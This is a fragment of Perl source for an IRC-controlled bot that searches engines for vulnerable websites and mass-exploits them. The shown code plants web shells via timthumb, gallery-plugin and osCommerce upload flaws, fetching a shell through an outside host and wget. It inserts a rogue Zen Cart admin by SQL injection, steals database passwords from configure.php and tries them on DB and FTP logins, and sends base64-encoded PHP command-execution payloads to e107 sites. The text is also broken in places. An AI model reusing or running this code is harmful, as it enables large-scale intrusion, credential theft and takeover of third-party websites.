NOTICE AUTH :\*\*\*/) { parse("$line"); } else { $line_temp = $line; } } }
} } ################################################################################ ## sub kulo() { my $dork = $_[0]; my @targets; for (my $st=0; $st<=1000 ; $st+=100){ my $engine = "http://www.google.com/search?q=".uri_escape($dork) ."&num=100&start=".$st; my $browser = &search_engine_query($engine); while ($browser =~ m/<a href=\"\/url\?q=http:\/\/([^"]*)\"/g) { my $target = $1; if ($target !~ /google|forum|stackoverflow|php\.net/) { my @sort = split(/\.php/,$target); push (@targets,$sort[0]); } } } return @targets; } sub cari() my my my my my my ; if { $chan = $_[0]; $dork = $_[1]; $count = 0; @kotor = &kulo($dork); @target = &clean(@kotor); $num = scalar(@target); &msg($chan,"$carilogo12 Total 4[15$num4]12 sites")
($num > 0) { foreach my $site(@target) { $count++; if ($count == $num-1) { &msg("$chan","$carilogo12Finished 15for 12$dork "); } my $test = "http://".$site.".php?src=".$thumbshell; if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { my $coba = &get_content($test); if ($coba =~ /Unable to open image/) { &msg($chan,"$carilogo12 VulN 4-> 15 http://".$site.".php "); } } exit; } } }
} sub type() { my ($chan,$bug,$simpan,$dork,$engine,$type) = @_; if ($type == 1){$type=&thumb_exploit($chan,$bug,$simpan,$dork,$engine);} elsif ($type == 2){$type=&whmcs_exploit($chan,$bug,$simpan,$dork,$engine );} elsif ($type == 3){$type=&lfi_exploit($chan,$bug,$simpan,$dork,$engine); } elsif ($type == 4){$type=&zero_exploit($chan,$bug,$simpan,$dork,$engine)
;} elsif ($type == 5){$type=&rfi_exploit($chan,$bug,$simpan,$dork,$engine); } elsif ($type == 6){$type=&xml_exploit($chan,$bug,$simpan,$dork,$engine); } elsif ($type == 7){$type=&e107_exploit($chan,$bug,$simpan,$dork,$engine) ;} elsif ($type == 8){$type=&ih_exploit($chan,$bug,$simpan,$dork,$engine);} elsif ($type == 9){$type=&osco_exploit($chan,$bug,$simpan,$dork,$engine) ;} elsif ($type == 10){$type=&zen_exploit($chan,$bug,$simpan,$dork,$engine) ;} elsif ($type == 11){$type=&rfg_exploit($chan,$bug,$simpan,$dork,$engine) ;} elsif ($type == 12){$type=&sql_exploit($chan,$bug,$simpan,$dork,$engine) ;} elsif ($type == 13){$type=&civicrm_exploit($chan,$bug,$simpan,$dork,$eng ine);} elsif ($type == 14){$type=&acy_exploit($chan,$bug,$simpan,$dork,$engine) ;} elsif ($type == 15){$type=&jnewsl_exploit($chan,$bug,$simpan,$dork,$engi ne);} elsif ($type == 16){$type=&jinc_exploit($chan,$bug,$simpan,$dork,$engine );} elsif ($type == 17){$type=&mai_exploit($chan,$bug,$simpan,$dork,$engine) ;} elsif ($type == 18){$type=&jnews_exploit($chan,$bug,$simpan,$dork,$engin e);} elsif ($type == 19){$type=&jnew_exploit($chan,$bug,$simpan,$dork,$engine );} } ################################################################################ ## sub se_start() { my ($chan,$bug,$simpan,$dork,$engine,$type) = @_; if ($gps ==1) { if ($engine =~ /Indoae/i) { if (my $pid = fork) { waitpid($pid, 0); } el se { if (fork) { exit; } else { &type($chan,$bug,$simpan,$dork,"IndoAE",$type); } exit; } } if ($engine =~ /Indoar/i) { if (my $pid = fork) { waitpid($pid, 0); } el se { if (fork) { exit; } else { &type($chan,$bug,$simpan,$dork,"IndoAR",$type); } exit; } } if ($engine =~ /Indoat/i) { if (my $pid = fork) { waitpid($pid, 0); } el se { if (fork) { exit; } else { &type($chan,$bug,$simpan,$dork,"IndoAT",$type); } exit; } } if ($engine =~ /Indoau/i) { if (my $pid = fork) { waitpid($pid, 0); } el se { if (fork) { exit; } else { &type($chan,$bug,$simpan,$dork,"IndoAU",$type); } exit; } } if ($engine =~ /Indobr/i) { if (my $pid = fork) { waitpid($pid, 0); } el se { if (fork) { exit; } else { &type($chan,$bug,$simpan,$dork,"IndoBE",$type); } exit; } } if ($engine =~ /Indobr/i) { if (my $pid = fork) { waitpid($pid, 0); } el se { if (fork) { exit; } else { &type($chan,$bug,$simpan,$dork,"IndoBG",$type); } exit; } } if ($engine =~ /Indobr/i) { if (my $pid = fork) { waitpid($pid, 0); } el se { if (fork) { exit; } else { &type($chan,$bug,$simpan,$dork,"IndoBR",$type); } exit; } } if ($engine =~ /Indobr/i) { if (my $pid = fork) { waitpid($pid, 0); } el
se { if (fork) { exit; } else { &type($chan,$bug,$simpan,$dork,"IndoBY",$type); } exit; } } if ($engine =~ /Indoca/i) { if (my $pid = fork) { waitpid($pid, 0); } el se { if (fork) { exit; } else { &type($chan,$bug,$simpan,$dork,"IndoCA",$type); } exit; } } if ($engine =~ /Indobr/i) { if (my $pid = fork) { waitpid($pid, 0); } el se { if (fork) { exit; } else { &type($chan,$bug,$simpan,$dork,"IndoCK",$type); } exit; } } if ($engine =~ /Indocl/i) { if (my $pid = fork) { waitpid($pid, 0); } el se { if (fork) { exit; } else { &type($chan,$bug,$simpan,$dork,"IndoCL",$type); } exit; } } if ($engine =~ /Indocn/i) { if (my $pid = fork) { waitpid($pid, 0); } el se { if (fork) { exit; } else { &type($chan,$bug,$simpan,$dork,"IndoCN",$type); } exit; } } if ($engine =~ /Indobr/i) { if (my $pid = fork) { waitpid($pid, 0); } el se { if (fork) { exit; } else { &type($chan,$bug,$simpan,$dork,"IndoCO",$type); } exit; } } if ($engine =~ /Indocom/i) { if (my $pid = fork) { waitpid($pid, 0); } e lse { if (fork) { exit; } else { &type($chan,$bug,$simpan,$dork,"IndoCoM",$type) ; } exit; } } if ($engine =~ /Indocz/i) { if (my $pid = fork) { waitpid($pid, 0); } el se { if (fork) { exit; } else { &type($chan,$bug,$simpan,$dork,"IndoCZ",$type); } exit; } } if ($engine =~ /Indode/i) { if (my $pid = fork) { waitpid($pid, 0); } el se { if (fork) { exit; } else { &type($chan,$bug,$simpan,$dork,"IndoDE",$type); } exit; } } if ($engine =~ /Indodk/i) { if (my $pid = fork) { waitpid($pid, 0); } el se { if (fork) { exit; } else { &type($chan,$bug,$simpan,$dork,"IndoDK",$type); } exit; } } if ($engine =~ /Indobr/i) { if (my $pid = fork) { waitpid($pid, 0); } el se { if (fork) { exit; } else { &type($chan,$bug,$simpan,$dork,"IndoEC",$type); } exit; } } if ($engine =~ /Indobr/i) { if (my $pid = fork) { waitpid($pid, 0); } el se { if (fork) { exit; } else { &type($chan,$bug,$simpan,$dork,"IndoEDU",$type); } exit; } } if ($engine =~ /Indobr/i) { if (my $pid = fork) { waitpid($pid, 0); } el se { if (fork) { exit; } else { &type($chan,$bug,$simpan,$dork,"IndoEE",$type); } exit; } } if ($engine =~ /Indoes/i) { if (my $pid = fork) { waitpid($pid, 0); } el se { if (fork) { exit; } else { &type($chan,$bug,$simpan,$dork,"IndoES",$type); } exit; } } if ($engine =~ /Indoeu/i) { if (my $pid = fork) { waitpid($pid, 0); } el se { if (fork) { exit; } else { &type($chan,$bug,$simpan,$dork,"IndoEU",$type); } exit; } } if ($engine =~ /Indobr/i) { if (my $pid = fork) { waitpid($pid, 0); } el se { if (fork) { exit; } else { &type($chan,$bug,$simpan,$dork,"IndoFI",$type); } exit; } } if ($engine =~ /Indofr/i) { if (my $pid = fork) { waitpid($pid, 0); } el se { if (fork) { exit; } else { &type($chan,$bug,$simpan,$dork,"IndoFR",$type); } exit; } } if ($engine =~ /Indobr/i) { if (my $pid = fork) { waitpid($pid, 0); } el se { if (fork) { exit; } else { &type($chan,$bug,$simpan,$dork,"IndoGR",$type); } exit; } } if ($engine =~ /Indobr/i) { if (my $pid = fork) { waitpid($pid, 0); } el se { if (fork) { exit; } else { &type($chan,$bug,$simpan,$dork,"IndoGOV",$type); } exit; } } if ($engine =~ /Indohu/i) { if (my $pid = fork) { waitpid($pid, 0); } el se { if (fork) { exit; } else { &type($chan,$bug,$simpan,$dork,"IndoHU",$type); } exit; } } if ($engine =~ /Indobr/i) { if (my $pid = fork) { waitpid($pid, 0); } el
se { if (fork) { exit; } else { &type($chan,$bug,$simpan,$dork,"IndoHK",$type); } exit; } } if ($engine =~ /Indobr/i) { if (my $pid = fork) { waitpid($pid, 0); } el se { if (fork) { exit; } else { &type($chan,$bug,$simpan,$dork,"IndoHR",$type); } exit; } } if ($engine =~ /Indoid/i) { if (my $pid = fork) { waitpid($pid, 0); } el se { if (fork) { exit; } else { &type($chan,$bug,$simpan,$dork,"IndoID",$type); } exit; } } if ($engine =~ /Indoil/i) { if (my $pid = fork) { waitpid($pid, 0); } el se { if (fork) { exit; } else { &type($chan,$bug,$simpan,$dork,"IndoIL",$type); } exit; } } if ($engine =~ /Indoin/i) { if (my $pid = fork) { waitpid($pid, 0); } el se { if (fork) { exit; } else { &type($chan,$bug,$simpan,$dork,"IndoIN",$type); } exit; } } if ($engine =~ /Indoinfo/i) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$simpan,$dork,"IndoInfO",$typ e); } exit; } } if ($engine =~ /Indoir/i) { if (my $pid = fork) { waitpid($pid, 0); } el se { if (fork) { exit; } else { &type($chan,$bug,$simpan,$dork,"IndoIR",$type); } exit; } } if ($engine =~ /Indoit/i) { if (my $pid = fork) { waitpid($pid, 0); } el se { if (fork) { exit; } else { &type($chan,$bug,$simpan,$dork,"IndoIT",$type); } exit; } } if ($engine =~ /Indojp/i) { if (my $pid = fork) { waitpid($pid, 0); } el se { if (fork) { exit; } else { &type($chan,$bug,$simpan,$dork,"IndoJP",$type); } exit; } } if ($engine =~ /Indokr/i) { if (my $pid = fork) { waitpid($pid, 0); } el se { if (fork) { exit; } else { &type($chan,$bug,$simpan,$dork,"IndoKR",$type); } exit; } } if ($engine =~ /Indobr/i) { if (my $pid = fork) { waitpid($pid, 0); } el se { if (fork) { exit; } else { &type($chan,$bug,$simpan,$dork,"IndoLV",$type); } exit; } } if ($engine =~ /Indobr/i) { if (my $pid = fork) { waitpid($pid, 0); } el se { if (fork) { exit; } else { &type($chan,$bug,$simpan,$dork,"IndoMD",$type); } exit; } } if ($engine =~ /Indomx/i) { if (my $pid = fork) { waitpid($pid, 0); } el se { if (fork) { exit; } else { &type($chan,$bug,$simpan,$dork,"IndoMX",$type); } exit; } } if ($engine =~ /Indomy/i) { if (my $pid = fork) { waitpid($pid, 0); } el se { if (fork) { exit; } else { &type($chan,$bug,$simpan,$dork,"IndoMY",$type); } exit; } } if ($engine =~ /Indonet/i) { if (my $pid = fork) { waitpid($pid, 0); } e lse { if (fork) { exit; } else { &type($chan,$bug,$simpan,$dork,"IndoNeT",$type) ; } exit; } } if ($engine =~ /Indonl/i) { if (my $pid = fork) { waitpid($pid, 0); } el se { if (fork) { exit; } else { &type($chan,$bug,$simpan,$dork,"IndoNL",$type); } exit; } } if ($engine =~ /Indobr/i) { if (my $pid = fork) { waitpid($pid, 0); } el se { if (fork) { exit; } else { &type($chan,$bug,$simpan,$dork,"IndoNO",$type); } exit; } } if ($engine =~ /Indobr/i) { if (my $pid = fork) { waitpid($pid, 0); } el se { if (fork) { exit; } else { &type($chan,$bug,$simpan,$dork,"IndoNZ",$type); } exit; } } if ($engine =~ /Indoorg/i) { if (my $pid = fork) { waitpid($pid, 0); } e lse { if (fork) { exit; } else { &type($chan,$bug,$simpan,$dork,"IndoOrG",$type) ; } exit; } } if ($engine =~ /Indoph/i) { if (my $pid = fork) { waitpid($pid, 0); } el se { if (fork) { exit; } else { &type($chan,$bug,$simpan,$dork,"IndoPH",$type); } exit; } } if ($engine =~ /Indobr/i) { if (my $pid = fork) { waitpid($pid, 0); } el
se { if (fork) { exit; } else { &type($chan,$bug,$simpan,$dork,"IndoPK",$type); } exit; } } if ($engine =~ /Indopl/i) { if (my $pid = fork) { waitpid($pid, 0); } el se { if (fork) { exit; } else { &type($chan,$bug,$simpan,$dork,"IndoPL",$type); } exit; } } if ($engine =~ /Indobr/i) { if (my $pid = fork) { waitpid($pid, 0); } el se { if (fork) { exit; } else { &type($chan,$bug,$simpan,$dork,"IndoPT",$type); } exit; } } if ($engine =~ /Indoro/i) { if (my $pid = fork) { waitpid($pid, 0); } el se { if (fork) { exit; } else { &type($chan,$bug,$simpan,$dork,"IndoRO",$type); } exit; } } if ($engine =~ /Indoru/i) { if (my $pid = fork) { waitpid($pid, 0); } el se { if (fork) { exit; } else { &type($chan,$bug,$simpan,$dork,"IndoRU",$type); } exit; } } if ($engine =~ /Indoth/i) { if (my $pid = fork) { waitpid($pid, 0); } el se { if (fork) { exit; } else { &type($chan,$bug,$simpan,$dork,"IndoTH",$type); } exit; } } if ($engine =~ /Indoth/i) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$simpan,$dork,"IndoTK",$type); } ex it; } } if ($engine =~ /Indoth/i) { if (my $pid = fork) { waitpid($pid, 0); } el se { if (fork) { exit; } else { &type($chan,$bug,$simpan,$dork,"IndoTR",$type); } exit; } } if ($engine =~ /Indoth/i) { if (my $pid = fork) { waitpid($pid, 0); } el se { if (fork) { exit; } else { &type($chan,$bug,$simpan,$dork,"IndoTV",$type); } exit; } } if ($engine =~ /Indoua/i) { if (my $pid = fork) { waitpid($pid, 0); } el se { if (fork) { exit; } else { &type($chan,$bug,$simpan,$dork,"IndoUA",$type); } exit; } } if ($engine =~ /Indouk/i) { if (my $pid = fork) { waitpid($pid, 0); } el se { if (fork) { exit; } else { &type($chan,$bug,$simpan,$dork,"IndoUK",$type); } exit; } } if ($engine =~ /Indous/i) { if (my $pid = fork) { waitpid($pid, 0); } el se { if (fork) { exit; } else { &type($chan,$bug,$simpan,$dork,"IndoUS",$type); } exit; } } if ($engine =~ /Indoth/i) { if (my $pid = fork) { waitpid($pid, 0); } el se { if (fork) { exit; } else { &type($chan,$bug,$simpan,$dork,"IndoVN",$type); } exit; } } if ($engine =~ /Indoth/i) { if (my $pid = fork) { waitpid($pid, 0); } el se { if (fork) { exit; } else { &type($chan,$bug,$simpan,$dork,"IndoWS",$type); } exit; } } if ($engine =~ /Indosi/i) { if (my $pid = fork) { waitpid($pid, 0); } el se { if (fork) { exit; } else { &type($chan,$bug,$simpan,$dork,"IndoSI",$type); } exit; } } if ($engine =~ /Indobe/i) { if (my $pid = fork) { waitpid($pid, 0); } el se { if (fork) { exit; } else { &type($chan,$bug,$simpan,$dork,"IndoZA",$type); } exit; } } if ($engine =~ /Indobiz/i) { if (my $pid = fork) { waitpid($pid, 0); } e lse { if (fork) { exit; } else { &type($chan,$bug,$simpan,$dork,"IndoBIZ",$type) ; } exit; } } } if ($engine =~ /google/i) { if (my $pid = fork) { waitpid($pid, 0); } el se { if (fork) { exit; } else { &type($chan,$bug,$simpan,$dork,"GooGLe",$type); } exit; } } if ($gps2 ==1) { if ($engine =~ /bing/i) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$simpan,$dork,"Bing",$type); } ex it; } } if ($engine =~ /biglobe/i) { if (my $pid = fork) { waitpid($pid, 0); } e lse { if (fork) { exit; } else { &type($chan,$bug,$simpan,$dork,"BigLobe",$type)
; } exit; } } if ($engine =~ /walla/i) { if (my $pid = fork) { waitpid($pid, 0); } els e { if (fork) { exit; } else { &type($chan,$bug,$simpan,$dork,"WaLLa",$type); } exit; } } if ($engine =~ /yahoo/i) { if (my $pid = fork) { waitpid($pid, 0); } els e { if (fork) { exit; } else { &type($chan,$bug,$simpan,$dork,"YaHoo",$type); } exit; } } if ($engine =~ /ask/i) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$simpan,$dork,"AsK",$type); } exit ; } } if ($engine =~ /uol/i) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$simpan,$dork,"UoL",$type); } exit ; } } if ($engine =~ /onet/i) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$simpan,$dork,"OnEt",$type); } ex it; } } if ($engine =~ /clusty/i) { if (my $pid = fork) { waitpid($pid, 0); } el se { if (fork) { exit; } else { &type($chan,$bug,$simpan,$dork,"CLusTy",$type); } exit; } } if ($engine =~ /sapo/i) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$simpan,$dork,"SaPo",$type); } ex it; } } if ($engine =~ /aol/i) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$simpan,$dork,"AoL",$type); } exit ; } } if ($engine =~ /lycos/i) { if (my $pid = fork) { waitpid($pid, 0); } els e { if (fork) { exit; } else { &type($chan,$bug,$simpan,$dork,"LyCos",$type); } exit; } } if ($engine =~ /hotbot/i) { if (my $pid = fork) { waitpid($pid, 0); } el se { if (fork) { exit; } else { &type($chan,$bug,$simpan,$dork,"HotBot",$type); } exit; } } if ($engine =~ /seznam/i) { if (my $pid = fork) { waitpid($pid, 0); } el se { if (fork) { exit; } else { &type($chan,$bug,$simpan,$dork,"SeZNam",$type); } exit; } } } } ###### EXPLOITING ####### sub rfg_exploit() { my $chan = $_[0]; my $bugz = $_[1]; my $simpan = $_[2]; my $dork = $_[3]; my $engine = $_[4]; my $count = 0; my @totexploit = &search_engine($chan,$bugz,$dork,$engine,$rfglogo); my $num = scalar(@totexploit); if ($num > 0){ foreach my $site(@totexploit){ $count++; if ($count == $num-1) { &msg("$chan","$rfglogo6$engine 12Finished" ); } my $test = "http://garguritos.com/rfg.php?url=http://". $site; my $html = &get_content($test); if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { my $vpath = "wp-content/plugins/radykal-fancy-ga llery/admin/";
if ($html =~ /<a href=\"http:\/\/(.*)$vpath(.*)\ ">Your shell/){ my $vuln = $1; my $qr = $2; my $upl = "http://".$vuln.$vpath.$qr."wg et ".$thumbshell; my $crut = &get_content($upl); if ($crut =~ /3xploit/) { my $shell = "http://".$vuln.$vpath."xp.p hp"; my $check = &get_content($shell); if ($check =~ /vito-RawckerheaD/i){ my $safe = ""; my $os = ""; my $ uid = ""; if ($check =~ m/SAFE_MODE: <b><f ont color=blue>(.*?)<\/font>/) {$safe = $1;} if ($check =~ m/color=red><b>&nb sp; (.*?)<br>/) {$os = $1;} if ($check =~ m/uid=(.*?)gid=/) {$uid = $1;} &msg("$admin","$rfglogo6$engine12 sHeLL11 ".$shell."12 (SafeMode=$safe) (OS=$os) uid=$uid "); &msg("$chan","$rfglogo6$engine12 s HeLL11 ".$shell."12 (SafeMode=$safe) (OS=$os) uid=$uid "); } else { &msg("$chan","$rfglogo6$engine12 V ulN12 http://".$vuln.$vpath.$qr."15 "); } } } } exit; } } } } sub zen_exploit() { my $chan = $_[0]; my $bug = $_[1]; my $simpan = $_[2]; my $dork = $_[3]; my $engine = $_[4]; my $count = 0; my @totexploit = &search_engine($chan,$bug,$dork,$engine,$zenlogo); my $num = scalar(@totexploit); if ($num > 0){ foreach my $site(@totexploit){ $count++; if ($count == $num-1) { &msg("$chan","$zenlogo6$engine 12Finished" ); } my $test = "http://".$site.$bug; my $html = &get_content($test); if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { if ($html =~ /zc_install/){ &zen_query($chan,$site,$test,$engine); } } exit; } } } }
sub zen_query() { my $chan = $_[0]; my $url = $_[1]; my $test = $_[2]; my $engine = $_[3]; my $code = "INSERT+INTO+admin+%28admin_id%2C+admin_name%2C+admin_email% 2C+admin_pass%29+VALUES+%2855%2C%27vito%27%2C%27vito@vito-keren.info%27%2C%27617 ec22fbb8f201c366e9848c0eb6925%3A87%27%29%3B"; my $req = HTTP::Request->new(POST => $test); $req->content_type("application/x-www-form-urlencoded"); $req->content("query_string=".$code); my $ua = LWP::UserAgent->new(agent => $uagent); $ua->timeout(3); my $res = $ua->request($req); my $data = $res->as_string; if ( $data =~ /1 statements processed/i ) { &msg("$chan","$zenlogo6$engine15 VulN12 http://".$url."admin/login. php vito : wew "); &msg("$admin","$zenlogo6$engine15 VulN12 http://".$url."admin/login .php vito : wew"); } elsif ( $data =~ /Duplicate entry/i ) { &msg("$chan","$zenlogo6$engine12 SuccesS12 http://".$url."admin/log in.php vito : wew)"); &msg("$admin","$zenlogo6$engine12 SuccesS12 http://".$url."admin/lo gin.php vito : wew"); } } sub osco_exploit() { my $chan = $_[0]; my $bug = $_[1]; my $simpan = $_[2]; my $dork = $_[3]; my $engine = $_[4]; my $count = 0; my @totexploit = &search_engine($chan,$bug,$dork,$engine,$oscologo); my $num = scalar(@totexploit); if ($num > 0){ foreach my $site(@totexploit){ $count++; if ($count == $num-1) { &msg("$chan","$oscologo6$engine 12Finished "); } my $cat = "http://".$site."admin/categories.php/login.ph p"; my $fm = "http://".$site."admin/file_manager.php/login.p hp"; my $bm = "http://".$site."admin/banner_manager.php/login .php"; my $shell = "http://".$site."images/log.php"; my $dumper = "http://".$site."images/logdb.php"; my $coba = &get_content($cat); my $cob2 = &get_content($fm); my $cob3 = &get_content($bm); if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { if ($coba =~ /TABLE_HEADING_CATEGORIES_PRODUCTS/ i ) { my $test = $cat."?action=download&filena me=/includes/configure.php";
my $cek = &get_content($test); if ($cek =~ /http:\/\//) { &osql_xpl($test,$chan,$site,$eng ine); } my $aplod = LWP::UserAgent->new; my $res = $aplod->post($cat."?cPath=&act ion=new_product_preview",['products_image' => ['./id.jpg' => 'log.php' => 'appli cation/octet-stream']],'Content-Type' => 'form-data'); $res->as_string; my $resa = $aplod->post($cat."?cPath=&ac tion=new_product_preview",['products_image' => ['./mysql.jpg' => 'logdb.php' => 'application/octet-stream']],'Content-Type' => 'form-data'); $resa->as_string; my $cekap = &get_content($shell); if ($cekap =~ /GIF89/i) { my $safe = ""; my $os = ""; my $ uid = ""; if ($cekap =~ m/SAFE_MODE: <b><f ont color=blue>(.*?)<\/font>/) {$safe = $1;} if ($cekap =~ m/color=red><b>&nb sp; (.*?)<br>/) {$os = $1;} if ($cekap =~ m/uid=(.*?)gid=/) {$uid = $1;} &msg("$chan","$oscologo6$engine12 sHeLL6 $shell15 (SafeMode=$safe) (OS=$os) uid=$uid "); &msg("$admin","$oscologo6$engine12 sHeLL6 $shell15 (SafeMode=$safe) (OS=$os) uid=$uid "); &msg("$chan","$oscologo6$engine12 Dumper6 $dumper ");sleep(1); } } if ($cob2 =~ /TABLE_HEADING_FILENAME/i) { my $test2 = $fm."?action=download&filena me=/includes/configure.php"; my $cek2 = &get_content($test2); if ($cek2 =~ /http:\/\//) { &osql_xpl($test2,$chan,$site,$en gine); } my $aplod2 = LWP::UserAgent->new; my $res2 = $aplod2->post($fm."?action=pr ocessuploads",['file_1' => ['./id.jpg' => 'log.php' => 'application/octet-stream ']],'Content-Type' => 'form-data'); $res2->as_string; my $resb = $aplod2->post($fm."?action=pr ocessuploads",['file_1' => ['./mysql.jpg' => 'logdb.php' => 'application/octet-s tream']],'Content-Type' => 'form-data'); $resb->as_string; my $cekap = &get_content($shell); if ($cekap =~ /GIF89/i) { my $safe = ""; my $os = ""; my $ uid = ""; if ($cekap =~ m/SAFE_MODE: <b><f ont color=blue>(.*?)<\/font>/) {$safe = $1;} if ($cekap =~ m/color=red><b>&nb sp; (.*?)<br>/) {$os = $1;} if ($cekap =~ m/uid=(.*?)gid=/) {$uid = $1;} &msg("$chan","$oscologo6$engine12 sHeLL6 $shell15 (SafeMode=$safe) (OS=$os) uid=$uid "); &msg("$admin","$oscologo6$engine12 sHeLL6 $shell15 (SafeMode=$safe) (OS=$os) uid=$uid "); &msg("$chan","$oscologo6$engine12
Dumper6 $dumper ");sleep(1); } } if ($cob3 =~ /TABLE_HEADING_BANNERS/i) { my $test3 = $bm."?action=download&filena me=/includes/configure.php"; my $cek3 = &get_content($test3); if ($cek3 =~ /http:\/\//) { &osql_xpl($test3,$chan,$site,$en gine); } my $aplod3 = LWP::UserAgent->new; my $res3 = $aplod3->post($bm."?action=in sert",['banners_image' => ['./id.jpg' => 'log.php' => 'application/octet-stream' ]],'Content-Type' => 'form-data'); $res3->as_string; my $resc = $aplod3->post($bm."?action=in sert",['banners_image' => ['./mysql.jpg' => 'logdb.php' => 'application/octet-st ream']],'Content-Type' => 'form-data'); $resc->as_string; my $cekap = &get_content($shell); if ($cekap =~ /GIF89/i) { my $safe = ""; my $os = ""; my $ uid = ""; if ($cekap =~ m/SAFE_MODE: <b><f ont color=blue>(.*?)<\/font>/) {$safe = $1;} if ($cekap =~ m/color=red><b>&nb sp; (.*?)<br>/) {$os = $1;} if ($cekap =~ m/uid=(.*?)gid=/) {$uid = $1;} &msg("$chan","$oscologo6$engine12 sHeLL6 $shell15 (SafeMode=$safe) (OS=$os) uid=$uid "); &msg("$admin","$oscologo6$engine12 sHeLL6 $shell15 (SafeMode=$safe) (OS=$os) uid=$uid "); &msg("$chan","$oscologo6$engine12 Dumper6 $dumper ");sleep(1); } } } exit; } } } } sub osql_xpl() { my $url = $_[0]; my $chan = $_[1]; my $site = $_[2]; my $engine = $_[3]; my $request = HTTP::Request->new(GET=>$url); my $browser = LWP::UserAgent->new(); $browser->timeout(10); my $response = $browser->request($request); my @dbsinfo; if ($response->is_success) { my $dpath = ""; my $dbserver = ""; my $dbuser = ""; my $dbpass = ""; my $dbname = ""; my $res = $response->as_string; if ($res =~ m/'DIR_FS_CATALOG', '(.*)'/g) { $dpath = $1; &msg("$chan","$oscosqllogo6$engine12 http://".$site." 15[+] DIR path: 4 $dpath");
} if ($res =~ m/'DB_SERVER', '(.*)'/g) { $dbserver = $1; &msg("$chan","$oscosqllogo6$engine12 http://".$site." 15[+] DB Server: 4 $dbserver"); } if ($res =~ m/'DB_SERVER_USERNAME', '(.*)'/g) { $dbuser = $1; &msg("$chan","$oscosqllogo6$engine12 http://".$site." 15[+] DB username: 4 $dbuser"); } if ($res =~ m/'DB_SERVER_PASSWORD', '(.*)'/g) { $dbpass = $1; &msg("$chan","$oscosqllogo6$engine12 http://".$site." 15[+] DB password: 4 $dbpass"); } if ($res =~ m/'DB_DATABASE', '(.*)'/g) { $dbname = $1; &msg("$chan","$oscosqllogo6$engine12 http://".$site." 15[+] DB database: 4 $dbname"); } my $hosts = "http://".$site; if($hosts =~ /([^:]*:\/\/)?([^\/]+\.[^\/]+)/g) { $host = $2; &dbi_connect($host,$dbuser,$dbpass,$dbname,$chan,$engine ,$oscologo);sleep(1); if ($dbuser =~ /_/) { my @users = split("_",$dbuser); my $dbuser = $users[0]; } &ftp_connect($url,$host,$dbuser,$dbpass,$chan,$engine,$o scologo);sleep(1); } } } sub e107_exploit() { my $chan = $_[0]; my $bug = $_[1]; my $simpan = $_[2]; my $dork = $_[3]; my $engine = $_[4]; my $count = 0; my @totexploit = &search_engine($chan,$bug,$dork,$engine,$e107logo); my $num = scalar(@totexploit); if ($num > 0){ foreach my $site(@totexploit){ $count++; if ($count == $num-1) { &msg("$chan","$e107logo6$engine 12Finished "); } my $test = "http://".$site.$bug; my $shellz = "http://".$site."/images/log.php"; my $code = "ZWNobyAidjBwQ3Izdzxicj4iOw0KZWNobyAic3lzOiIu cGhwX3VuYW1lKCkuIjxicj4iOw0KJGNtZD0iZWNobyBub2IwZHlDcjN3IjsNCiRlc2VndWljbWQ9ZXgo JGNtZCk7DQplY2hvICRlc2VndWljbWQ7DQpmdW5jdGlvbiBleCgkY2ZlKXsNCiRyZXMgPSAnJzsNCmlm ICghZW1wdHkoJGNmZSkpew0KaWYoZnVuY3Rpb25fZXhpc3RzKCdleGVjJykpew0KQGV4ZWMoJGNmZSwk cmVzKTsNCiRyZXMgPSBqb2luKCJcbiIsJHJlcyk7DQp9DQplbHNlaWYoZnVuY3Rpb25fZXhpc3RzKCdz aGVsbF9leGVjJykpew0KJHJlcyA9IEBzaGVsbF9leGVjKCRjZmUpOw0KfQ0KZWxzZWlmKGZ1bmN0aW9u X2V4aXN0cygnc3lzdGVtJykpew0KQG9iX3N0YXJ0KCk7DQpAc3lzdGVtKCRjZmUpOw0KJHJlcyA9IEBv Yl9nZXRfY29udGVudHMoKTsNCkBvYl9lbmRfY2xlYW4oKTsNCn0NCmVsc2VpZihmdW5jdGlvbl9leGlz dHMoJ3Bhc3N0aHJ1Jykpew0KQG9iX3N0YXJ0KCk7DQpAcGFzc3RocnUoJGNmZSk7DQokcmVzID0gQG9i X2dldF9jb250ZW50cygpOw0KQG9iX2VuZF9jbGVhbigpOw0KfQ0KZWxzZWlmKEBpc19yZXNvdXJjZSgk
ZiA9IEBwb3BlbigkY2ZlLCJyIikpKXsNCiRyZXMgPSAiIjsNCndoaWxlKCFAZmVvZigkZikpIHsgJHJl cyAuPSBAZnJlYWQoJGYsMTAyNCk7IH0NCkBwY2xvc2UoJGYpOw0KfX0NCnJldHVybiAkcmVzOw0KfQ== "; my $html = &e107_rce_query($test,$code); if (my $pid = fork) { waitpid($pid, 0); } else { if (for k) { exit; } else { if ($html =~ /v0pCr3w<br>sys:(.+?)<br>nob0dyCr3w/) { my $sys = $1; my $upload = ""; my $res = &e107_rce_query($test); if ($res =~ /kuloxx/) { my $check = &get_content($shellz); if ($check =~ /kulo - nuwun/) { &msg("$chan","$e107logo6$engine12 sHeLL6 $shellz ");sleep(2); } } else { &msg("$chan","$e107logo6$engine15 System12 $test 15($sys) ");sleep(2); } } } exit; } } } } sub e107_rce_query() { my $url = $_[0]; my $code = encode_base64('echo "kuloxx";')."JGM9Z3ppbmZsYXRlKHN0cl9yb3QxMyhi YXNlNjRfZGVjb2RlKCJ4VWw2UXVNNEVQNThWZndINCtzcXFSWVNTK21rRlRUc1pSQ1dWd2ZsMm1WZkFG Smg0cmFHeEk1NWgyRVA4ZDlxZVNkOVRHazVRVTJKVjBpVG1YVGVIcytNMi9sSFFjdk5EVktWYjRJblZ4 